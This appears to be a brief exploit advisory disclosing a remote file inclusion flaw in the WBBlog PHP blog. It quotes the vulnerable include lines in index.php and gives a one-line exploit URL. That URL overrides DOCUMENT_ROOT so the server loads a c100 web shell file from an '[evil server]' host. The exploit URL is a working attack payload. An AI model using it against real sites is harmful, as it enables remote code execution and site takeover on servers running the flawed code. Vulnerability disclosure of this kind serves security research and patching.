view source
print?
#################################################################
#
# WBBlog Remote File Inclusion Vulnerability
# Found By: mr_me
# Download: http://liqua.com/post/WBBlog.html
# Tested On: Linux
# Note: For educational purposes only
#
#################################################################
 
Remote file include in index.php on lines 25 and 26
 
8<-------------------------------------snip-------------------------------------8<
 
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/config.inc.php');
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/init.inc.php');
 
8<-------------------------------------snip-------------------------------------8<
 
exploit:
 
http://[server]/wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://[evil server]/c100.txt?